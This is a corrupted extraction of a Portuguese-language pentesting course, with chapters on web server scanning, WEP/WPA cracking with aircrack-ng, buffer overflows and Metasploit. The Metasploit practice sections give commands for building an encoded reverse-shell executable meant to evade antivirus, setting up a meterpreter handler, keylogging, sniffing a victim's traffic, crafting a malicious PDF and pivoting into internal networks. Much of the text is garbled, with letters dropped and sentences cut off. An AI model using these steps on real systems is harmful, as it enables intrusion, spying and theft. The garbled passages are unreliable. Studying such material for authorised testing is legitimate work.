S'6$ 4tta:
●
Send 6ail 4tta:
O grande riso de servidores 8;+E que os mesmo estão 2# oras no arE ) dias por semana. >avendo qualquer vulnerabilidade ou erro na onfiguração não 3 dQvida de que em um determinado momento ser3 e
16!)! Aingerprint em 5e# Server 4ntes de testar qualquer tipo de ataque ontra um servidor 8;+ que tena sido desoberto ao longo do proesso de teste de invasãoE preisamos ter aesso à algumas informaç%es b3sias sobre nosso alvo. Hm dos meios de se onseguir isso atravs do fingerprint realiDado sobre o servidor 8;+E ou simplesmente usando o domínio ospedado no mesmo omo parUmetro. 4 seguirE vamos ver uma ferramenta que realiDa esse proedimento automatiamenteE bastando que informemos o nome do domínio ospedado.
Capítulo 16 ;ta
16.3.1. :""$rin"
Ferramenta para pegar o banner de identifiação do servidor Geb.
4 partir da imagem aimaE usando um site qualquer omo e
6irosoft,IIS&(.*E om 12."#[
●
6irosoft,IIS&(.1E om 12E"#[
●
4pae&1.".20E om 12E"#[
Capítulo 16 ;ta
16!4! @es.o#rindo =ulnera#ilidades .om ,i
$odemos adiionar o sinaliDador de evasãoE que tenta ontornar seus sistemas de I-S? = perl ni&to"pl -# %%%"4<6"com")r -evasion
;
Capítulo 16 ;ta
no publi_tml. 6uitos aam que pelo fato do diret7rio possuir ,Inde
16!-! uditoria e 78ploração de 5e# Servers .om 5)A
;ssa ferramenta um frameGor: para auditoria e ataque em apliaç%es Geb. 2gina do pro1eto: #ttp:$$sourceforge"net$pro1ects$%af$ Yídeos: #ttp:$$%af"sourceforge"net$videos$video-demos"p#p
O mais interessanteE que podemos personaliDar os testes que essa ferramenta pode realiDarE podendo utiliDarE tambmE profiles previamente onfigurados por padrão. emosE por e
Capítulo 16 ;ta
16!6! "nline S.anner >3 v3rias ferramentas online que podemos utiliDar para faDer a varredura de Geb servers e obter informaç%es neess3rias para a e
O site 'etraft oferee informaç%es sobre as onfiguraç%es do servidor onde o site est3 ospedadoE sobre domínios vinulados ao que est3 sendo pesquisado e muitas outras informaç%es importantes para podermos realiDar um ataque om suesso.
P3 o `ero-aASanE um site que permite faDer a varredura em busa de vulnerabilidades que posam e
Capítulo 16 ;ta
O Qnio empeilo para realiDar um ataque desse tipoE que neess3rio ospedar um arquivo t
16!! Contramedidas ●
●
●
BealiDar onstantes verifiaç%es nas onfiguraç%es de segurança dos servidores Geb. 4tualiDar onstantemente os servidores. -iminuir ao m3
Capítulo 16 ;ta
Capítulo 1 ta&ues a Redes Sem Aio
1!1! "#$etivos ●
;ntender as tnias para aessar as redes sem fio
●
Hma visão sobre 8;$E 8$4 e as tnias de ataque
●
;ntender omo funiona o ataque baseado em BainboG ables
Capítulo 17 ;ta
1!%! Introdução 'una dei
ter
aesso
a
informaç%es
Hma rede Gireless mal projetada pode driblar todo o arsenal de defesa j3 implementado. @amos imaginar a seguinte situação? sua empresa oloou uma murala e fireGallJ para proteção dos ataques. $ormE a murala ompletamente inefiiente ontra os ataques areos e GirelessJ. 4ntes de omeçar a implementar uma rede GirelessE faça um planejamento e estude toda a topologia da rede. 'ão se esqueça de evitar os ataques areosW
1!)! 5ardriving Hm dos ataques mais omuns e omentados em redes Gireless o 8ar -rivingE que tem omo objetivo XandarY om um dispositivo Gireless em busa de 4ess $oints. ;sse ataque tira proveito de uma araterístia fundamental? difíil ontrolar e limitar o alane de redes Gireless. O ataante pode estar neste e
Capítulo 17 ;ta
1!4! ta&ues ao proto.olo 57P 4s informaç%es que trafegam em uma rede Gireless podem ser riptografadas. O protoolo 8;$ 8ired ;quivalent $rivaAJ aplia riptografia avançada ao sinal e verifia os dados om uma Xave de segurançaY eletr\nia. $ormE a Hniversidade de +er:eleA revelou a possibilidade de alguns tipos de ataques que e
Coloando a interfae Gireless em modo monitor? = airmon-ng start %lan0
Iniiando a aptura dos paotes? = airodump-ng --ivs -% %ep -c canalKdaKrede mon0
Onde? , Canal
Capítulo 17 ;ta
,G $refi
Onde? ,1 Opção para mandar uma autentiação falsa * empo para reassoiaçãoE em segundos ,e ;SSI- do alvo 'ome do aess pointJ ,a 6a 4ddress do 4ess $oint , 'osso 64C 4ddress Glan* 'ossa interfae Gireless 4goraE vamos tentar enviar arp request para a redeE na tentativa que alguma maquina reeba e omee a enviar arp replaA para n7sE aumentando o tr3fego rapidamente. Isso pode ser observado na tela do airodump,ngE onde a quantidade de Z-44Z apturada aumentar3 rapidamente. = airepla<-ng - -) 00:00:00:00:00:0 -# 00:00:00:00:00:0B %lan0
Onde? ," Opção para arp request ,b 64C 4ddress do 4ess $oint , 64C 4ddress usado na assoiação. 'esse asoE o nosso 64C Glan* 'ossa interfae Gireless 4gora que temos uma quantidade grande de paotesE podemos e
Capítulo 17 ;ta
airra: para de fatoE desobrirmos a ave? =aircrac&-ng -a %ep-0"ivs
Onde? ,a 6odo para forçar um determinado tipo de ataque 1 8;$ Gep,*1.ivs 4rquivo gerado pelo airodump,ng seleionamos o prefi
1!-! SSI@ ".ulto Os SSI- oultos podem ser failmente detetados atravs de sniffersE uma veD que o seu nome trafegado sem riptografia em uma rede. $or issoE oultar um SSInão aumenta a segurança de uma rede sem fio. O pr7prio airra:E utiliDando o airodumpE j3 nos mostra todos os SSI-E inluindo os oultos. Caso um SSI- não seja e
1!6! 3C Spooing 4lgumas pessoas areditam que estão seguras ap7s liberar o aesso aos seus 4ess $oints apenas para determinados 64C 4ddress. O 64C addressE que um valor que vem de f3bria nas nossas interfaes de redesE pode ser alterado. = relativamente simples XforjarY o endereço físio da sua plaa de rede. $ortantoE não podemos onfiar apenas nesse ontrole para garantir a segurança de
Capítulo 17 ;ta
uma rede sem fio. ;
; omo podemos oneer o 64C 4ddress de um usu3rio de uma determinada rede! SimplesE sniffer novamente. Como e
1!! 5P Hrute Aor.e Bedes om 8$4 ainda não possuem uma vulnerabilidade omo o 8;$E onde onseguimos desobrir a ave ap7s analisar o tr3fego depois de um erto período de tempo. $ormE possível realiDar brute fore ontra o as da sena enviada durante a one<ão entre um liente v3lido da rede e tentar desobrir a sena utiliDada para one<ão à rede. @amos e
Onde? , anal ,G prefi
Onde?
Capítulo 17 ;ta
,* ( opção de deautentiaçãoE enviando ( requisiç%es ,a 64C 4ddress do 4ess $oint alvo , 64C 4ddress do liente que vamos deautentiar Glan* nossa interfae Gireless Ruebrando a sena apturada om o airodump,ng? = aircrac&-ng -a B -% %ordlist"t4t %pa-0"cap
Onde? ,a 6odo para forçar um determinado tipo de ataque 2 8$4&8$42,$S ,G Gordlist Gpa,*1.ap arquivo gerado pelo airodump,ng
1!2! 5P Rain#oG Ta#les Como j3 visto anteriormenteE sabemos que a quebra de senas om rainboG tables muito mais r3pida do que om Gordlist. Como o algoritmo de enriptação do protoolo 8$4 mais forte do que 8;$E neess3rio utiliDarmos rainboG tables para quebrar suas senas. $rograma para usar rainboG tables? "$co%patt< -r WdumpX -d Wrain)o%Kta)leX -s WSSIDX
#ttp:$$%%%"securit
Capítulo 17 ;ta
-oGnload de rainboG tables? #ttp:$$%%%"securit<-data)ase"com$tools%atc#$/-9ain)o%-Ta)les'ffensive"#tml
1!! Rougue ..ess Point Bougue 4ess point são 8/4' 4ess $oints que não estão autoriDados a onetar em uma rede. Hm Bougue 4$ abre um XburaoY Gireless na rede. Hm a:er pode implantar um rougue 4ess point ou um funion3rio pode riar um problema de segurança sem saberE simplesmente onetando um 4ess $oint desonfigurado na rede da empresa. Hma veD que foi identifiado um novo 4$ na redeE sem onfiguraçãoE basta que onfiguremos a nossa interfae de rede para se onetar nesse novo ambiente desprotegido. #ttp:$$%%%"securit
1!10! 5ii PEisEing 8iFi pising oorre em otspots pQblios onde usu3rios utiliDam aess points. O ataante aproveita,se do fato de que os SSI- estão visíveis a todos na 3rea oberta pela rede. O ataante utiliDa,se dessa informação e onfigura um aess point om o mesmo SSI- para onvener os usu3rios a se onetarem no aess point falso. Hm mtodo mais sofistiado ainda forçar os usu3rios a se desonetar do
Capítulo 17 ;ta
aess point real e então onetar ao aess point do ataante. Ferramenta para onfigurar um aess point? ="$airsnarf
1!11! Contramedidas ●
HtiliDar senas fortes nos 4ess point
●
'ão usar 8;$
●
'ão onfiar em ontrole de aesso via 64C 4ddress
●
$ossuir uma polítia de segurança atualiDadaE que ontrole as redes sem fio.
Capítulo 17 ;ta
Capítulo 12 78ploits
12!1! "#$etivos ●
●
;ntender o que um +uffer OverfloG 4prender omo e
Capítulo 18 )=plo%t" - 205
12!%! 3as ainalF o &ue ' um e8ploit( Hm e
12!)! "rgani>ação dos Pro.essos na 3em9ria $ara entendermos omo funiona um buffer overfloGE n7s preisaremos entender omo funiona a pila sta:J. 4 região de te
Capítulo 18 )=plo%t" - 206
destas. O endereço de base da pila fi
Capítulo 18 )=plo%t" - 207
salvar o F$ anteriorE para que possa ser restaurado ao fim da e
12!4! SEell.ode Sellode um grupo de instruç%es assemblA em formato de opode para realiDar diversas funç%es omo amar uma sellE ou esutar em uma porta. 9eralmenteE um sellode utiliDado para e
Capítulo 18 )=plo%t" - 208
S8ellcode 6U3bbU3<
12!-! Huer "verloG Hm buffer overfloG aontee quando um programa vulner3vel a esse tipo de fala tenta opiar mais informaç%es para dentro de um buffer do que esse buffer onsegue suportar. $ara visualiDar issoE a mesma oisa que pegar uma garrafa de refrigerante de 2 litros e virar ela toda num opo de (**ml. Com erteDa oorrer3 uma sujeira na mesa em que isso foi feitoE e a mesma oisa que oorre na mem7riaE um esparramado de arateres sobre a mem7ria que ir3 sobresrever informaç%es importantes assim omo o refrigerante sujou toda a toala da mesa. 4s vulnerabilidades de buffer overfloG são onsideradas ameaças rítias de segurançaE apesar de ser uma fala bem oneida e bastante sriaE que se origina e<lusivamente na ignorUnia do programador referente a aspetos de segurança durante a implementação do programaE o erro se repete sistematiamente a ada nova versão ou produto liberado. ;ste tipo de vulnerabilidade tem sido largamente utiliDado para a penetração remota de omputadores ligados a uma redeE onde um ataante an\nimo tem omo objetivo obter aesso ilegal ao omputador vulner3vel. 6esmo softGare onsiderado seguroE omo o OpenSS>E j3 apresentou o problemaE e tambm softGares famosos omo o Sendmail e m7dulos do 4pae. +uffer overfloGs são tambm amados de buffer overruns e e
Capítulo 18 )=plo%t" - 209
tipos de ataques de estouro de bufferE entre eles sta: smasing atta:sE ataques ontra buffers que se enontram na pila vou am3,la de sta:JE e eap smasing atta:sE que são ataques ontra buffers que se enontram na eap. eniamenteE um buffer overfloG um problema om a l7gia interna do programaE mas a e
Salve o arquivo omo overrun.E depois ompile e e
$ara test3,loE digite o seguinte no prompt e
; veja o que aonteeW O que ausa essa falaE o fato de que a vari3vel XnameY oupa apenas um determinado espaço que pequenoJ na mem7ria. Ruando estouramos esse espaçoE e onseguimos sobresrever a pila ;I$ da mem7riaE inserindo um omando que queiramos que seja e
12!6! Con.lusão ●
Com issoE onseguimos demonstrar o perigo que uma fala de programação em um programa.
●
= possível obter ontrole ompletamente sobre o programa que esta sendo e
●
Se o programa ofereer algum serviço remotamenteE a fala pode ser e
Capítulo 18 )=plo%t" - 211
Capítulo 1 3etasploit ArameGor<
1!1! "#$etivos ●
;ntender omo funiona o 6etasploit
●
;ntender o funionamento e omo utiliDar o 6eterpreter
●
4prender omo onseguir one<ão direta e reversa om o alvo
●
4prender a implantar ba:doors atravs do 6etasploit
●
4prender a omprometer uma m3quina da rede interna atravs de uma -6` omprometida
Capítulo 19 >eta"plo%t rae:or( - 212
1!%! Introdução 4 pesquisa de vulnerabilidades de softGare evoluiu muito nos Qltimos anos. O pesquisador de vulnerabilidades o tnio respons3vel em enontrar falas no softGare que podem levar a um mal funionamento do softGareE ou ainda a uma possível fala de segurança. 4 visão geral sobre segurança não se limita apenas a um possível invasor ou aesso não autoriDado ao sistemaE segurança de softGare signifia manter o softGare em seu perfeito funionamentoE ou sejaE o funionamento imaginado pelo desenvolvedor. 'o en3rio atual da segurança da informaçãoE infeliDmente tentamos proteger a informação não pela raiD do problemaE esrevendo programas om qualidadeE mas riando outros softGares para proteger um softGare mal desenvolvido anteriormente. $or e
1!)! " &ue ' 3etasploit ArameGor< Como menionado em seu 8ebsiteE 6etasploit FrameGor: uma avançada plataforma Open SoureE onebida espeifiamente om o objetivo de reforçar e
Capítulo 19 >eta"plo%t rae:or( - 213
aelerar o desenvolvimentoE ensaio e utiliDação de e
objetivo do
6SF
riar um
ambiente
de
pesquisaE
desenvolvimento e e
4escoberta da &ulnerabilidade? Onde o pesquisador desobre um erro de programação que pode levar ou não a uma brea de segurança
●
Análise? Onde o pesquisador analisa a vulnerabilidade para determinar quais as maneiras pela qual a mesma pode ser e
●
4esen&ol&imento do e3ploit? -epois de respondidas as perguntas da fase de an3liseE omeça o desenvolvimento da e
Capítulo 19 >eta"plo%t rae:or( - 214
prova da e
Teste do e3ploit? 'essa fase o e
-esde a onsolidação do 6etasploit FrameGor:E a omparação om produtos omeriais om araterístias semelantes inevit3vel. $rojetos C4'@4S da ImmunitA Se ou COB; I6$4C da Core SeuritA enologA tem uma grande lientelaE que vão desde grandes lientes orporativos que faDem uso destes produtos na ora de faDerem suas pr7prias tentativas de invasãoE at entenas de onsultores de segurança independente que utiliDam,no omo uma ferramenta para vender este serviço a tereiros. Sem dQvidaE a prinipal diferença entre 6etasploit FrameGor: e este tipo de produto o ZfooZ. ;mbora os produtos omeriais preisem forneer onstantemente aos seus lientes os mais reentes e
1!4! Instalando 3etasploit ArameGor< ;m primeiro lugarE pois omo omentado nos par3grafos anterioresE 6etasploit FrameGor: pode ser instalado tanto no Hni<&/inu< quanto no 8indoGs. 4queles que se sentem onfort3veis om o 8indoGsE tem o praDer de saber
Capítulo 19 >eta"plo%t rae:or( - 215
que a instalação do 6etasploit não tem grandes segredos. $ara esta Qltima versãoE os desenvolvedores do 6etasploit surpreendem,nos om um simp3tio assistenteE que ir3 guiar,nos atravs da implementação de um ambiente personaliDado CAgGinE seguida pela instalação e onfiguração do pr7prio FrameGor:. 4ssimE apenas o doGnload e a e
4p7s ter feito issoE preisa apenas dar permissão de e
;mbora seja verdade que om o que aonteeu at agora sufiiente para se familiariDar om o produtoE se sua intenção a de obter todo o proveito dessa ferramentaE provavelmente quer ter a erteDa que tena instalado o m7dulo $erl amado Z'et?? SS/eaAZ eE se não for esse o asoE proeda à sua instalação aproveitando que o mesmo instala,se om o 6etasploitE entre os arquivos organiDados no subdiret7rio Ze
Capítulo 19 >eta"plo%t rae:or( - 216
1!-! Nm olEar so#re o ArameGor< $erfeitoW Se voV egou at aquiE provavelmente est3 ansioso para testar o funionamento de seu novo ambiente de trabalo. 4ntes de omeçarE preisamos saber que o 6etasploit FrameGor: fornee,nos basiamente trVs diferentes interfaesE no momento de interagir om os mesmos? ●
Command Gine Interface? ;sta a forma orreta para interagir om o FrameGor:E quando da automatiDação de testes de seqVnias de e
●
Console Interface? = prov3vel que seja esta a interfae mais omumente utiliDadaE devido à sua utiliDação intuitiva e interativaE à veloidade do seu funionamento e à sua fle
●
Interface eb? ;mbora tena muitos detratoresE a interfae Geb 6etasploit pode ser e
1.5.1. Desenoli(en"o o *S9
4 primeira versão est3vel do 6SF foi lançada em meados de 2**#. Originalmente esrito em $erlE 4ssembler e C. Seus desenvolvedores veja a lista no endereçoJ resolveram quebrar o paradigma de omo os e
Capítulo 19 >eta"plo%t rae:or( - 217
;srever um e
Capítulo 19 >eta"plo%t rae:or( - 218
1!6! Te.nologia por detr/s do ArameGor<
O nQleo do 6etasploit reside no B;K BubA ;
; a doumentação da 4$I B;K? #ttp:$$frame%or&"metasploit"com$documents$api$re4$inde4"#tml
$ara e
Capítulo 19 >eta"plo%t rae:or( - 219
do programa e o S;> trata desses erros. 4 lasse Be?;
Ou ainda? #ttp:$$free%orld"t#c"org$do%nload"p#p7tLpfLractical-S;-e4ploitation"pdf
Frameor= Core? = formado de v3rios sub,sistemas omo gereniamento de m7dulosE sess%esE despao de eventos et. Frameor= ase? $rovV a interfae para interagir om o FrameGor: Core provendo onfiguraç%esE registro de logs e sess%es. Interfaces? $rovV a interfae om o usu3rioE atualmente são? msfonsoleE msfliE msfguiE msfGebE msfd. %0dulos? São ompostos pelos e
$ara o iniiante importante saber a diferença entre e
Capítulo 19 >eta"plo%t rae:or( - 220
onsiderada ideal e robusta. O 6etasploit pode servir para auditar essas ferramentas. ;
que
podem
ser
usadas
para
evadir
os
detetores
de
intrusãoE
C$??ma<_send_siDeE C$??send_delaAE >$??un:edE >$??ompressionE S6+??pipe_evasionE -C;B$C??bind_multiE -C;B$C??alter_onte
imestomp? Hsado para modifiar os arquivos do sistema de arquivo 'eG enologA File SAstem 'FSJ. $ode,se modifiar os valores de quando os arquivos foram riadosE deletados et.
●
Sla:er? Hsado para esonder arquivos em partiç%es 'FS.
●
Sam Puier? Hm m7dulo do 6eterpreter usado pra e
●
ransmogrifA? Ferramenta usada pra passar pelo ;nCases file, signaturing.
●
Soial,;ngineering ool:it? O Soial,;ngineering ool:it S;J foi desenvolvido por -avid ennedA Be/1J e inorpora muitos ataques Qteis de engenaria soialE todos em uma interfae simples. O prinipal objetivo do S; automatiDar e melorar muitos dos ataques de engenaria soial a partir dele.
1!! Te.nologia do 3eterpreter PaKload 4 fase amada p7s,e
Capítulo 19 >eta"plo%t rae:or( - 221
O meterpreter supera as limitaç%es e fornee v3rias 4$Is que permitem ao ataante e
1!2! 3etasploit e "SST33 em vídeo ;stão disponíveis no site do FOS-;6 , Free and Open Soure SoftGare -evelopment , dois vídeos fant3stios. Simplesmente duas apresentaç%es sobre duas ferramentas esseniais em pentestE metasploit e a metodologia OSS6 Open Soure SeuritA esting 6etodologA 6anualJ. ; não uma simples apresentaçãoE são duas apresentaç%es de duas oras tendo omo apresentador os pais das rianças >. -. 6oore e $ete >erDog respetivamente. ImperdívelW (etasploit
-
#ttp:$$ftp")elnet")e$mirrors$O'SD($B00E$O'SD(B00E-
(etasploit"ogg 'SST((
-
#ttp:$$ftp")elnet")e$mirrors$O'SD($B00E$O'SD(B00E-
Securit
@eja tambm alguns vídeos de utiliDação do 6etasploit FrameGor:? #ttp:$$%%%"
Capítulo 19 >eta"plo%t rae:or( - 222
1!! tuali>ando o 3etasploit ;ntre no diret7rio do 6SF om o seguinte omando? = cd $pentest$e4ploits$frame%or&$
$ara atualiDar o 6SFE digite o seguinte omando? = svn update
1!10! Primeiros passos na utili>ação do 3etasploit 4bai
-epois de alguns segundos dependendo da veloidade de seu omputadorJE a tela de 6SFConsole apareer3 onforme a imagem. /eve alguns momentos para e
Capítulo 19 >eta"plo%t rae:or( - 223
$ara ver os v3rios e
Capítulo 19 >eta"plo%t rae:or( - 224
$ara informação sobre um omando em partiularE voV pode usar o omando de info. @oV sempre poder3 ter erteDa do omando se for Qtil antes de voV e
@eja abai
Capítulo 19 >eta"plo%t rae:or( - 225 Id Name -- ---0 /utomatic Targetting indo%s B000 nglis# B indo%s H nglis# .asic options: Name ?urrent Setting 9equired Description -------- ------------------- ------------ -------------- 9;'ST
Capítulo 19 >eta"plo%t rae:or( - 226
;ssas informaç%es e
O prompt msfN automatiamente muda para Zmsf e
Capítulo 19 >eta"plo%t rae:or( - 227
4gora preisamos saber o que podemos faDer om esse e
$ara definirmos o tipo de alvo que ataaremos e
Capítulo 19 >eta"plo%t rae:or( - 228
autom3tioE 1 8indoGs 2*** e 2 8indoGs K$J. $ara sabermos o tipo de S.O. de nosso alvoE deveremos ter pesquisado isso na fase de fingerprintingE onde olemos informaç%es sobre nossos osts alvos. @amosE omo e
'esse pontoE se digitarmos Z!Z no prompt msfNE alm da e
Como e
Capítulo 19 >eta"plo%t rae:or( - 229
@emos que o valor de B$OB est3 omo ##(E que ser3 a porta atravs da qual ser3 lançado o e
O valor da opção B$OB foi alterado para 1(*E que ser3 a porta utiliDada para o ataque. 4gora vamos à outra opção. 4 opção B>OS definir3 o endereço que ser3 ataado via e
@ejamos abai
4gora preisamos ompletar o e
Capítulo 19 >eta"plo%t rae:or( - 230
'o aso desse e
1!11! n/lise inal Sinta,se à vontade para testar om outros e
1!1%! Pr/ti.a dirigida 1.12.1. Paloa !o( *e"er$re"er
Com o msf atualiDadoE iremos riar o paAload que enviaremos para o nosso alvo. $rosseguimos om o seguinte omando?
Capítulo 19 >eta"plo%t rae:or( - 231 =
"$msfpa
%indo%s$s#ell$reverseKtcp
@;'STLHH"HH"HH"HH
@'9TL>>!! H P cliqueaqui"e4e
Ser3 riado no diret7rio orrente o arquivo e
-epois dos resultadosE vamos faDer um XtunningY em nosso .e
"$msfpa
%indo%s$s#ell$reverseKtcp
@;'STLHH"HH"HH"HH
@'9TL>>!! 9 V "$msfencode -c ! -e 48F$s#i&ataKgaKnai -a 48F -t ra% V "$msfencode -c ! -a 48F -e 48F$alp#aKmi4ed -t ra% V "$msfencode -c -e 48F$call>Kd%ordK4or -t e4e P cliqueaquiB"e4e
4 opção , diD quantas veDes ada enoder ir3 interagir om o nosso paAloadE nos dias de ojeE isso j3 não adianta muitoE demonstrado apenas para ver as possibilidades de se redireionar a saída de um enoder para outro. -epois do tunning em nosso .e
Capítulo 19 >eta"plo%t rae:or( - 232
4p7s riar o .e
4o ser e
emos uma sessão ativa om I- de nQmero 1 identifiando,a. 4gora vamos interagir om o onsole meterpreterE basta o omando? P sessions -i
Se o alvo abrir o gereniador de tarefas no GindoGsE ver3 o proesso de nosso e
Capítulo 19 >eta"plo%t rae:or( - 233
Com isso feitoE vamos testar os omandos sAsinfo e iponfig. $ara saber os omandos disponíveisE digite XelpY ou X!Y.
1.12.2. elo##in# !o( *e"er$re"er
4gora vamos usar o :eAlogging e vamos tentar apturar o m3
4gora vamos ver o que nosso :eAlogger pegou om o omando :eAsan_dump e logo em seguida finaliDo o mesmo. P &e
Capítulo 19 >eta"plo%t rae:or( - 234
1.12.3. Sniffin# !o( *e"er$re"er
$rimeiramente preisamos arregar o m7dulo sniffer om o omando use sniffer. P use sniffer
;m seguidaE pedimos para listar as interfaes de rede om o omando sniffer_interfaes. P snifferKinterfaces
Iremos iniiar nosso sniffer nesta interfae indiada pelo nQmero 1 om o omando Zsniffer_start 1ZE podemos esperar o tempo que aarmos onveniente. P snifferKstart
@ejamos algumas informaç%es sobre o arquivo sniffer.ap usando o apinfos. P capinfos sniffer"cap
Capítulo 19 >eta"plo%t rae:or( - 235
@amos analisar o arquivo sniffer.ap om a ferramenta 8iresar:. +asta abrir o 8iresar: e ir em File N Open e apontar para o arquivo sniffer.ap.
1.12.4. *an"eno o a!esso
; se a pessoa reiniiar ou at mesmo desligar a m3quina destino! $ara isso e
O omando aima riar3 um arquivo e
Capítulo 19 >eta"plo%t rae:or( - 236 P use e4ploit$multi$#andler P set /j@'/D %indo%s$meterpreter$reverseKtcp P set @;'ST AB"F8"0"0 P set @'9T >>>> P e4ploit
1.12.5. Prin"S!reen
Outro reurso interessante que o meterpreter nos oferee a possibilidade de tirarmos um printsreen da m3quina alvo. P use espia
Capítulo 19 >eta"plo%t rae:or( - 237
Hsamos o omando use espiaE para arregar o m7dulo meterpreter e em seguida e
$ara poder usar este reurso ser3 neess3rio estar e
1.12.6. *e"as$loi" &o%e F$loi"
4bra um terminal e entre no diret7rio do msf? = cd $pentest$e4ploits$frame%or&$ = "$msfconsole
Capítulo 19 >eta"plo%t rae:or( - 238
@amos agora espeifiar o e
@amos alterar as seguintes opç%es? ●
FI/;'46; Ser3 gerado o arquivo pdf om o nome aqui espeifiado por n7s.
●
I'FI/;'46; 4qui espeifiaremos um pdf omo modelo para ane
●
OH$H$4> = o diret7rio onde ser3 riado e armaDenado o pdf.
P set OI@N/( planil#aB"pdf P set INOI@N/( $root$planil#a"pdf P set 'TT/T; $root$ P s#o% options
Capítulo 19 >eta"plo%t rae:or( - 239
4gora vamos onfigurar nosso paAloadE usarei o meterpreter reverse_tp. @eja imagem abai
Capítulo 19 >eta"plo%t rae:or( - 240
'a imagem aima eu espeifique meu paAload GindoGs&meterpreter&reverse_tpJE espeifiquei meu ost loal />OS 152.10.*.11*JE espeifiquei mina porta loal /$OB ##((J e logo em seguida dei o omando e
Hsamos o e
Capítulo 19 >eta"plo%t rae:or( - 241
1.12.7. &"a!ano '( o%Ke"io final a $ar"ir e '(a (M'ina K !o($ro(e"ia
O primeiro passo obviamente enontrar uma vulnerabilidade no servidor que se enontra na -6` e e
Capítulo 19 >eta"plo%t rae:or( - 242
4gora preisamos saber o I- da sessãoE para isso digitamos o seguinte no terminal do meterpreter? P sessions -l
O seguinte passo riar uma rota at a m3quina que nosso objetivo finalE indiando seu I$E a m3sara e o I- de sessão que obtivemos no passo anterior? = route add WipKmaquinaKo)1etivoX W(2scara de redeX WID-Sess3oX
$or QltimoE realiDamos o ataque à m3quina objetivoE de forma normalE omo se faria em qualquer outro asoE quer diDerE busando a vulnerabilidade e apliando o respetivo e
-esta forma podemos realiDar um ZbApassZ usando o 6etasploit
1.12.8. &"a!ano (M'inas inoHs >P is"a 7 2003 2008 a"ra;s e '( He%serer falso ;ssa e
Capítulo 19 >eta"plo%t rae:or( - 243
@amos l3... O primeiro omando seleiona o e
Caso queiramos mais informaç%es sobre o e
;sse omando e
;sse Qltimo omandoE permitir3 onfigurarmos o I$ no qual o servidor Geb falso ser3 montado para que a vítima aesso,o. 'o omando abai
>avendo onfigurado a parte b3sia do e
udo onfiguradoE funionando bemE sem nenum erroE simplesmente lançamos o e
$ara onseguirmos que a vítima onete,seE nada omo um bom e velo ataque de engenaria soial ?,J
Capítulo 19 >eta"plo%t rae:or( - 244
1!1)! rmitage 4 distribuição +a:ra: onta agora om mais uma opção de usabilidade do 6etasploitE essa nova opção a 4rmitage. O 4rmitage uma 9HI interfae gr3fiaJ para 6etasploitE que torna todo o proesso de e
Capítulo 19 >eta"plo%t rae:or( - 245
1.13.1. Confi#'ra)=o o &r(i"a#e $ara instalar o 4rmitage no +a:tra:E preisamos atualiDar os reposit7rios e instalar o paote ZarmitageZ. rootG)t:]= apt-get update rootG)t:]= aptitude install 1ava-pac&age rootG)t:]= apt-get install armitage npac&ing armitage from """$armitageK0"-)t0Ki8F"de)J """ Setting up armitage 0"-)t0J """
O 4rmitage omunia,se om o 6etasploit atravs do daemon B$CE então preisamos inii3,lo. rootG)t:]= msfrpcd -f - msf - test -t .asic WX H(@9? starting on 0"0"0"0:!!!! SS@J:.asic"""
4 pr7
$or
QltimoE
e
o
Zarmitage.sZ
a
partir
da
pasta
&pentest&e
Capítulo 19 >eta"plo%t rae:or( - 246
Seleionamos a opção ZHse SS/ZE verifiamos os restante das onfiguraç%es e liamos em ZConnetZ. 4p7s issoE a janela prinipal do 4rmitage e
Capítulo 19 >eta"plo%t rae:or( - 247
1.13.2. arreno !o( o &r(i"a#e $ara seleionar uma varredura que queiramos e
4p7s liar em Z/aunZE preisamos aguardar um pouo para que a varredura se omplete e os osts detetados sejam e
Capítulo 19 >eta"plo%t rae:or( - 248
Se ouver algum ost que não queiramos utiliDar omo alvoE eles podem ser removidos liando om o botão direitoE e
Capítulo 19 >eta"plo%t rae:or( - 249
Cliando om o botão direito e seleionando ZServiesZ uma nova aba se abrir3 e
6esmo om essas simples varredurasE podemos ver que onseguimos muitas informaç%es sobre nossos alvos que são apresentadas para n7s em uma interfae bem amig3vel. 4diionalmenteE todas as informaç%es são armaDenadas em nosso bano de dados 6ASR/. m
Capítulo 19 >eta"plo%t rae:or( - 250
Data)ase c#anged m
V osKflavor
V
R---------------R-----------------R V AB"F8""B0! V indo%s B00 9B V V AB"F8""B0> V indo%s B00 9B V V AB"F8""B0F V indo%s H
V
V AB"F8""B0 V indo%s H
V
V AB"F8""B0 V indo%s H
V
R---------------R-----------------R ! ro%s in set 0"00 secJ m
1.13.3. F$lorano !o( o &r(i"a#e 'a varredura onduDida anteriormenteE podemos ver que um dos alvos est3 e
Capítulo 19 >eta"plo%t rae:or( - 251
4ssim omo na varredura que onduDimos anteriormenteE toda a onfiguração neess3ria foi feita para n7s. udo o que preisamos liar em Z/aunZ e aguardar a sessão do 6eterpreter ser aberta para n7s. @eja na imagem abai
Ruando liamos om o botão direito no ost e
FaDemos o dump dos ases no sistema e
Capítulo 19 >eta"plo%t rae:or( - 252
4gora liamos em Z/aunZ e aguardamos reeber mais sells via 6eterpreterW
Como podemos verE o 4rmitage nos proporiona uma e<elente interfae para o 6etasploit que pode nos eonomiDar muito tempo em alguns asos. ; possível enontrar mais informaç%es em seu site? #ttp:$$%%%"fastandeas<#ac&ing"com$media .
Capítulo 19 >eta"plo%t rae:or( - 253
1!14! 5map Ge# s.anner 864$ um sanner de vulnerabilidades Geb que foi riado originalmente a partir de uma ferramenta amada SR/6ap. ;sta ferramenta integrada om o 6etasploit e nos permite onduDir a varredura de apliaç%es Geb a partir do FrameGor:.
1.14.1. Confi#'rano o *a$ $rimeiro preisamos riar um novo bano de dados para armaDenar os resultados da varreduraE arregar o plgin ZGmapZE e e
Description
-----------
%mapKrun
Test targets
Capítulo 19 >eta"plo%t rae:or( - 254 %mapKsites
(anage sites
%mapKtargets (anage targets """corte"""
1.14.2. &i!ionano alos 4ntes de e
Displa< t#is #elp te4t
-a WurlX
/dd site v#ost,urlJ
-l
@ist all availa)le sites
-s WurlsX levelJ Displa< site structure v#ost,urlJ msf P %mapKsites -a dominio-a-partir-do-%%%,ip-v2lido
4p7s issoE aresentamos o alvo que desejamos varrer utiliDando o omando ZGmap_targets ,tZ. msf P %mapKtargets -t dominio-a-partir-do-%%%,ip-v2lido
Hsando o omando ZGmap_runZ iniiaremos a varredura do sistema alvo. $rimeiro usamos o parUmetro Z,tZ para listar os m7dulos que serão usados para varrer o sistema remoto. msf P %mapKrun -# WX sage: %mapKrun WoptionsX -#
Displa< t#is #elp te4t
-t
S#o% all matc#ing e4ploit modules
-e WprofileX matc#ed targets"
@aunc# profile test modules against all
